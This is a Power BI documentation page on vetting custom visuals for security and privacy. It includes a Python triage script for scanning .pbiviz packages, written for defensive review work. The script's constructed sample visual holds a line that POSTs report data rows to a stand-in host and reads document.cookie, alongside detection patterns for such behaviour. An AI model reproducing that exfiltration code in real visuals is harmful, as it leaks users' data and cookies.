Review custom visuals for security and privacy
Before you enable a custom visual, review it for security and privacy to make sure it fits your organization's standards.
Considerations before you enable a custom visual
A custom visual could contain code with security or privacy risks; therefore, a custom visual in the report is disabled until you choose Enable custom visuals. Here are some considerations to decide whether to enable a custom visual:
- Ensure you trust the author and the source of the custom visuals used in the report
- If you are unsure what to do, you should reach out to your IT team to weigh in on whether you should enable custom visuals for reports you view.
- If someone shares a report with you that contains a custom visual, even if they're a close co-worker, do not feel obligated to enable the custom visual. It's okay to step back and consider whether it is essential to the task at hand. It's always okay to ask someone to provide you a report without custom visuals if you don't feel confident about the custom visual.
Security best practices for IT Professionals to enable a custom visual
A custom visual could contain code with security or privacy risks; therefore, a custom visual in the report is disabled until you choose Enable custom visuals. There are several best practices you can follow to evaluate a custom visual for security and privacy.
- Implement a vetting process for custom visuals within the organization. Vetted custom visuals can then be shared with internal users through an internal site, such as a SharePoint document library or a OneNote document, so that business users have a trusted place to get them.
- Provide guidance for business users on appropriate use of custom visuals and an email group for business users to send security and privacy questions to.
To inspect the code of a custom visual, unpack the package (a .pbiviz file is a zip archive):
- Save the .pbiviz file to a folder.
- Rename the file to a .zip file.
- Extract the zip file to a local folder.
Custom visual file contents
The following are the contents of a pbiviz file:
| File | Description |
|---|---|
| ./package.json | A manifest file that indicates which files to load for the custom visual. |
| ./resources/<name> | <name> is the name of the custom visual. |
| ./resources/<name>.css | The CSS resource file for the custom visual. |
| ./resources/<name>.png | The icon shown to the user for the visual. |
After you extract the pbiviz file, you can evaluate the code. Here are some best practices and threats to look for.
- Always evaluate the .js file contents. This is the code that actually runs. The .ts source shipped with the visual is not necessarily what the included .js file was compiled from, so the .ts file alone is not enough.
- Always evaluate the .ts file contents as well. You can load the .ts file into the Developer Tools, export the visual, and compare the .js file in the newly created .pbiviz file with the original .js file contained in the visual; any difference means the shipped code is not what the source shows.
- Check that the icon for the custom visual does not resemble too closely other visuals the user is familiar with.
- Always evaluate the visual in a test account that has minimal privileges and does not have access to any sensitive data. Ideally the test account would be a local account with no sign-in information to services other than Power BI.
- Check network activity when the visual is being used in both edit and view mode. Ensure you're satisfied with the requests that are being made. You should not see requests to resources outside the Power BI domain unless the visual author has communicated this ahead of time.
- Any data you see leaving the Power BI domain should match your expectations for what 'normal' use would be. For example, if the visual implements a video player that uses an iframe to view a video from another site, some information must travel in the iframe requests to render the video correctly. However, if you see the entire data set being sent across the wire, investigate further whether that is required and desired.
- Check if personally identifiable data is being sent or stored by the custom visual.
- Check if the custom visual is trying to access local machine resources such as writing files to disk or accessing cookies.
- Check if the custom visual has what appears to be obfuscated code or code without a clear purpose.
- Save copies of each visual you have reviewed, so that a later version can be compared against what you approved.
- If you are reviewing an update to a visual you previously reviewed, check for changes against the saved copy. Always apply the same rigor to updates as you did the first time you received the visual for review.
- If you find something suspicious or unclear, please reach out to us; we're here to help.
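The unpacking steps and the review checklist above can be partly automated as a first-pass triage. The script below is an added example for this page, not Microsoft code or any part of the Power BI tooling. It reads a .pbiviz directly as a zip archive (the same thing as the rename-to-.zip-and-extract steps), records a SHA-256 hash of every member so the review can be kept and compared against a later update, and flags places in the compiled .js that a reviewer should read by hand: network calls, cookie or client-side storage access, dynamic code evaluation, iframes, URLs pointing outside the Power BI domain, and hex-escape or long base64-looking literals that suggest obfuscation. The trusted-host list, the pattern set and the sample package (including its placeholder package.json contents) are assumptions constructed for the example; a hit is a place to look, not proof of malice, and a clean scan is not proof of safety.

```python
"""Added example: static triage of a legacy-layout .pbiviz package (not Microsoft code)."""
import hashlib
import io
import json
import re
import zipfile

# Hosts a visual may legitimately talk to: the Power BI service plus whatever
# the author disclosed ahead of time. ASSUMPTION: the reviewer maintains this
# list; it is not a published allow-list.
TRUSTED_HOSTS = {"app.powerbi.com", "api.powerbi.com"}

# Heuristic patterns worth reading by hand in the compiled .js.
SUSPICIOUS = {
    "network-call": re.compile(r"\b(?:fetch|XMLHttpRequest|WebSocket|sendBeacon)\b"),
    "cookie-access": re.compile(r"document\.cookie"),
    "client-storage": re.compile(r"\b(?:localStorage|sessionStorage|indexedDB)\b"),
    "dynamic-code": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    "iframe": re.compile(r"<iframe\b|createElement\(\s*['\"]iframe['\"]\s*\)"),
}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Obfuscation hints: a run of hex escapes, or a very long base64-looking literal.
OBFUSCATION_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}|['\"][A-Za-z0-9+/=]{200,}['\"]")


def load_pbiviz(data: bytes) -> dict:
    """A .pbiviz is a zip archive; return {member path: bytes} without touching disk."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {n: zf.read(n) for n in zf.namelist() if not n.endswith("/")}


def scan_js(path: str, source: str, trusted_hosts) -> tuple:
    """Flag patterns in one compiled .js file; return (findings, external hosts)."""
    findings, external = [], set()

    def line_of(pos):  # 1-based line number of an offset into source
        return source.count("\n", 0, pos) + 1

    for kind, rx in SUSPICIOUS.items():
        for m in rx.finditer(source):
            findings.append({"file": path, "kind": kind, "line": line_of(m.start()), "match": m.group(0)})
    for m in URL_RE.finditer(source):
        host = m.group(1).lower()
        if host not in trusted_hosts:  # traffic leaving the Power BI domain
            external.add(host)
            findings.append({"file": path, "kind": "external-host", "line": line_of(m.start()), "match": host})
    m = OBFUSCATION_RE.search(source)
    if m:
        findings.append({"file": path, "kind": "possible-obfuscation", "line": line_of(m.start()), "match": m.group(0)[:20]})
    return findings, external


def review_pbiviz(data: bytes, trusted_hosts=TRUSTED_HOSTS) -> dict:
    """Review one package: per-file hashes (keep with the review record), findings, external hosts."""
    files = load_pbiviz(data)
    if "package.json" not in files:
        raise ValueError("package.json missing: not the legacy pbiviz layout this example expects")
    json.loads(files["package.json"])  # must at least be well-formed JSON
    report = {"sha256": {p: hashlib.sha256(b).hexdigest() for p, b in files.items()},
              "findings": [], "external_hosts": set()}
    js_files = [p for p in files if p.endswith(".js")]
    if not js_files:  # nothing to run means nothing to review; that is itself a finding
        report["findings"].append({"file": "", "kind": "no-js-found", "line": None, "match": ""})
    for p in js_files:
        found, ext = scan_js(p, files[p].decode("utf-8", errors="replace"), trusted_hosts)
        report["findings"].extend(found)
        report["external_hosts"] |= ext
    return report


def changed_files(old_report: dict, new_report: dict) -> list:
    """Paths whose hash differs from a previously reviewed version of the visual."""
    old, new = old_report["sha256"], new_report["sha256"]
    return sorted(p for p in set(old) | set(new) if old.get(p) != new.get(p))


# Constructed sample, not a real visual: compiled code that does things a
# reviewer should question. The package.json content is a placeholder.
SAMPLE_JS = r"""
var api = "https://api.powerbi.com/v1.0/myorg"; // expected: Power BI service
function update(options) {
  var rows = options.dataViews[0].table.rows;
  fetch("https://collector.example.net/upload", {method: "POST", body: JSON.stringify(rows)});
  var c = document.cookie;
  var k = "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a";
}
"""


def build_sample_pbiviz(js: str = SAMPLE_JS) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("package.json", json.dumps({"name": "sampleVisual"}))  # placeholder manifest
        zf.writestr("resources/sampleVisual.js", js)
        zf.writestr("resources/sampleVisual.css", ".sampleVisual { color: black; }")
    return buf.getvalue()


if __name__ == "__main__":
    rep = review_pbiviz(build_sample_pbiviz())
    for f in rep["findings"]:
        print(f"{f['file']}:{f['line']}: {f['kind']} {f['match']}")
    print("external hosts:", sorted(rep["external_hosts"]))
```

Run it against a real package with `review_pbiviz(open("visual.pbiviz", "rb").read())`, store the returned report with the saved copy of the visual, and when an update arrives run `changed_files(old_report, new_report)` to see which members changed before re-reading them with the same rigor as the first review. The static scan complements, and does not replace, watching the visual's network activity in a minimally privileged test account.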
- Visualizations in Power BI
- Custom Visualizations in Power BI
- Publish custom visuals to the Office store
- Getting started with custom visuals developer tools
- How to certify a custom visual
- Video: Creating custom visualizations for Power BI with Sachin Patney and Nico Cristache
More questions? Try asking the Power BI Community